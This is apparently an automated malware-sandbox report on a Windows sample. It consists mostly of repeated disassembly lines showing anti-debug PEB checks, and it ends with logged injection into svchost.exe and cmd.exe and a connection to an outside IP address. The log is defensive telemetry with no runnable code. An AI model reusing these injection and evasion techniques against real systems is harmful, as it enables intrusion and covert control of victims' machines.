          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055ED6E0 mov eax, dword ptr fs:[00000030h]5_2_055ED6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055ED6E0 mov eax, dword ptr fs:[00000030h]5_2_055ED6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C4690 mov eax, dword ptr fs:[00000030h]5_2_055C4690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C4690 mov eax, dword ptr fs:[00000030h]5_2_055C4690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564368C mov eax, dword ptr fs:[00000030h]5_2_0564368C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564368C mov eax, dword ptr fs:[00000030h]5_2_0564368C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564368C mov eax, dword ptr fs:[00000030h]5_2_0564368C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564368C mov eax, dword ptr fs:[00000030h]5_2_0564368C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055B76B2 mov eax, dword ptr fs:[00000030h]5_2_055B76B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055B76B2 mov eax, dword ptr fs:[00000030h]5_2_055B76B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055B76B2 mov eax, dword ptr fs:[00000030h]5_2_055B76B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F66B0 mov eax, dword ptr fs:[00000030h]5_2_055F66B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BD6AA mov eax, dword ptr fs:[00000030h]5_2_055BD6AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BD6AA mov eax, dword ptr fs:[00000030h]5_2_055BD6AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FC6A6 mov eax, dword ptr fs:[00000030h]5_2_055FC6A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C6154 mov eax, dword ptr fs:[00000030h]5_2_055C6154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C6154 mov eax, dword ptr fs:[00000030h]5_2_055C6154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BC156 mov eax, dword ptr fs:[00000030h]5_2_055BC156
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C7152 mov eax, dword ptr fs:[00000030h]5_2_055C7152
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055B9148 mov eax, dword ptr fs:[00000030h]5_2_055B9148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055B9148 mov eax, dword ptr fs:[00000030h]5_2_055B9148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055B9148 mov eax, dword ptr fs:[00000030h]5_2_055B9148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055B9148 mov eax, dword ptr fs:[00000030h]5_2_055B9148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05659179 mov eax, dword ptr fs:[00000030h]5_2_05659179
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05654144 mov eax, dword ptr fs:[00000030h]5_2_05654144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05654144 mov eax, dword ptr fs:[00000030h]5_2_05654144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05654144 mov ecx, dword ptr fs:[00000030h]5_2_05654144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05654144 mov eax, dword ptr fs:[00000030h]5_2_05654144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05654144 mov eax, dword ptr fs:[00000030h]5_2_05654144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05653140 mov eax, dword ptr fs:[00000030h]5_2_05653140
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05653140 mov eax, dword ptr fs:[00000030h]5_2_05653140
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05653140 mov eax, dword ptr fs:[00000030h]5_2_05653140
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]5_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05695152 mov eax, dword ptr fs:[00000030h]5_2_05695152
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05658158 mov eax, dword ptr fs:[00000030h]5_2_05658158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C1131 mov eax, dword ptr fs:[00000030h]5_2_055C1131
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C1131 mov eax, dword ptr fs:[00000030h]5_2_055C1131
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BB136 mov eax, dword ptr fs:[00000030h]5_2_055BB136
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BB136 mov eax, dword ptr fs:[00000030h]5_2_055BB136
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BB136 mov eax, dword ptr fs:[00000030h]5_2_055BB136
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BB136 mov eax, dword ptr fs:[00000030h]5_2_055BB136
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F0124 mov eax, dword ptr fs:[00000030h]5_2_055F0124
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05680115 mov eax, dword ptr fs:[00000030h]5_2_05680115
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0566A118 mov ecx, dword ptr fs:[00000030h]5_2_0566A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0566A118 mov eax, dword ptr fs:[00000030h]5_2_0566A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0566A118 mov eax, dword ptr fs:[00000030h]5_2_0566A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0566A118 mov eax, dword ptr fs:[00000030h]5_2_0566A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056961E5 mov eax, dword ptr fs:[00000030h]5_2_056961E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FD1D0 mov eax, dword ptr fs:[00000030h]5_2_055FD1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FD1D0 mov ecx, dword ptr fs:[00000030h]5_2_055FD1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056671F9 mov esi, dword ptr fs:[00000030h]5_2_056671F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056951CB mov eax, dword ptr fs:[00000030h]5_2_056951CB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F01F8 mov eax, dword ptr fs:[00000030h]5_2_055F01F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056861C3 mov eax, dword ptr fs:[00000030h]5_2_056861C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056861C3 mov eax, dword ptr fs:[00000030h]5_2_056861C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]5_2_055E51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]5_2_055E51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]5_2_055E51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]5_2_055E51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]5_2_055E51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]5_2_055E51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]5_2_055E51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]5_2_055E51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]5_2_055E51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]5_2_055E51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]5_2_055E51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]5_2_055E51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]5_2_055E51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C51ED mov eax, dword ptr fs:[00000030h]5_2_055C51ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0563E1D0 mov eax, dword ptr fs:[00000030h]5_2_0563E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0563E1D0 mov eax, dword ptr fs:[00000030h]5_2_0563E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0563E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0563E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0563E1D0 mov eax, dword ptr fs:[00000030h]5_2_0563E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0563E1D0 mov eax, dword ptr fs:[00000030h]5_2_0563E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056711A4 mov eax, dword ptr fs:[00000030h]5_2_056711A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056711A4 mov eax, dword ptr fs:[00000030h]5_2_056711A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056711A4 mov eax, dword ptr fs:[00000030h]5_2_056711A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056711A4 mov eax, dword ptr fs:[00000030h]5_2_056711A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BA197 mov eax, dword ptr fs:[00000030h]5_2_055BA197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BA197 mov eax, dword ptr fs:[00000030h]5_2_055BA197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BA197 mov eax, dword ptr fs:[00000030h]5_2_055BA197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05600185 mov eax, dword ptr fs:[00000030h]5_2_05600185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DB1B0 mov eax, dword ptr fs:[00000030h]5_2_055DB1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0567C188 mov eax, dword ptr fs:[00000030h]5_2_0567C188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0567C188 mov eax, dword ptr fs:[00000030h]5_2_0567C188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05617190 mov eax, dword ptr fs:[00000030h]5_2_05617190
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564019F mov eax, dword ptr fs:[00000030h]5_2_0564019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564019F mov eax, dword ptr fs:[00000030h]5_2_0564019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564019F mov eax, dword ptr fs:[00000030h]5_2_0564019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564019F mov eax, dword ptr fs:[00000030h]5_2_0564019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05695060 mov eax, dword ptr fs:[00000030h]5_2_05695060
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564106E mov eax, dword ptr fs:[00000030h]5_2_0564106E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C2050 mov eax, dword ptr fs:[00000030h]5_2_055C2050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EB052 mov eax, dword ptr fs:[00000030h]5_2_055EB052
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0563D070 mov ecx, dword ptr fs:[00000030h]5_2_0563D070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]5_2_055D1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D1070 mov ecx, dword ptr fs:[00000030h]5_2_055D1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]5_2_055D1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]5_2_055D1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]5_2_055D1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]5_2_055D1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]5_2_055D1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]5_2_055D1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]5_2_055D1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]5_2_055D1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]5_2_055D1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]5_2_055D1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]5_2_055D1070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EC073 mov eax, dword ptr fs:[00000030h]5_2_055EC073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05646050 mov eax, dword ptr fs:[00000030h]5_2_05646050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0566705E mov ebx, dword ptr fs:[00000030h]5_2_0566705E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0566705E mov eax, dword ptr fs:[00000030h]5_2_0566705E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DE016 mov eax, dword ptr fs:[00000030h]5_2_055DE016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DE016 mov eax, dword ptr fs:[00000030h]5_2_055DE016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DE016 mov eax, dword ptr fs:[00000030h]5_2_055DE016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DE016 mov eax, dword ptr fs:[00000030h]5_2_055DE016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05656030 mov eax, dword ptr fs:[00000030h]5_2_05656030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568903E mov eax, dword ptr fs:[00000030h]5_2_0568903E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568903E mov eax, dword ptr fs:[00000030h]5_2_0568903E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568903E mov eax, dword ptr fs:[00000030h]5_2_0568903E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568903E mov eax, dword ptr fs:[00000030h]5_2_0568903E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05644000 mov ecx, dword ptr fs:[00000030h]5_2_05644000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BA020 mov eax, dword ptr fs:[00000030h]5_2_055BA020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BC020 mov eax, dword ptr fs:[00000030h]5_2_055BC020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056460E0 mov eax, dword ptr fs:[00000030h]5_2_056460E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E90DB mov eax, dword ptr fs:[00000030h]5_2_055E90DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056020F0 mov ecx, dword ptr fs:[00000030h]5_2_056020F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]5_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C0 mov ecx, dword ptr fs:[00000030h]5_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C0 mov ecx, dword ptr fs:[00000030h]5_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]5_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C0 mov ecx, dword ptr fs:[00000030h]5_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C0 mov ecx, dword ptr fs:[00000030h]5_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]5_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]5_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]5_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]5_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]5_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]5_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]5_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]5_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]5_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]5_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]5_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C0 mov eax, dword ptr fs:[00000030h]5_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0563D0C0 mov eax, dword ptr fs:[00000030h]5_2_0563D0C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0563D0C0 mov eax, dword ptr fs:[00000030h]5_2_0563D0C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BC0F0 mov eax, dword ptr fs:[00000030h]5_2_055BC0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056950D9 mov eax, dword ptr fs:[00000030h]5_2_056950D9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C80E9 mov eax, dword ptr fs:[00000030h]5_2_055C80E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BA0E3 mov ecx, dword ptr fs:[00000030h]5_2_055BA0E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056420DE mov eax, dword ptr fs:[00000030h]5_2_056420DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E50E4 mov eax, dword ptr fs:[00000030h]5_2_055E50E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E50E4 mov ecx, dword ptr fs:[00000030h]5_2_055E50E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F909C mov eax, dword ptr fs:[00000030h]5_2_055F909C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C5096 mov eax, dword ptr fs:[00000030h]5_2_055C5096
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056580A8 mov eax, dword ptr fs:[00000030h]5_2_056580A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055ED090 mov eax, dword ptr fs:[00000030h]5_2_055ED090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055ED090 mov eax, dword ptr fs:[00000030h]5_2_055ED090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00FDE653 GetProcessHeap,GetLastError,HeapFree,GetLastError,7_2_00FDE653
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FAAB64C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF67FAAB64C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00FE0063 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00FE0063
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00FDFD20 SetUnhandledExceptionFilter,7_2_00FDFD20

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 103.235.47.188 80Jump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeMemory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeMemory allocated: C:\Windows\System32\cmd.exe base: 400000 protect: page execute and read and writeJump to behavior
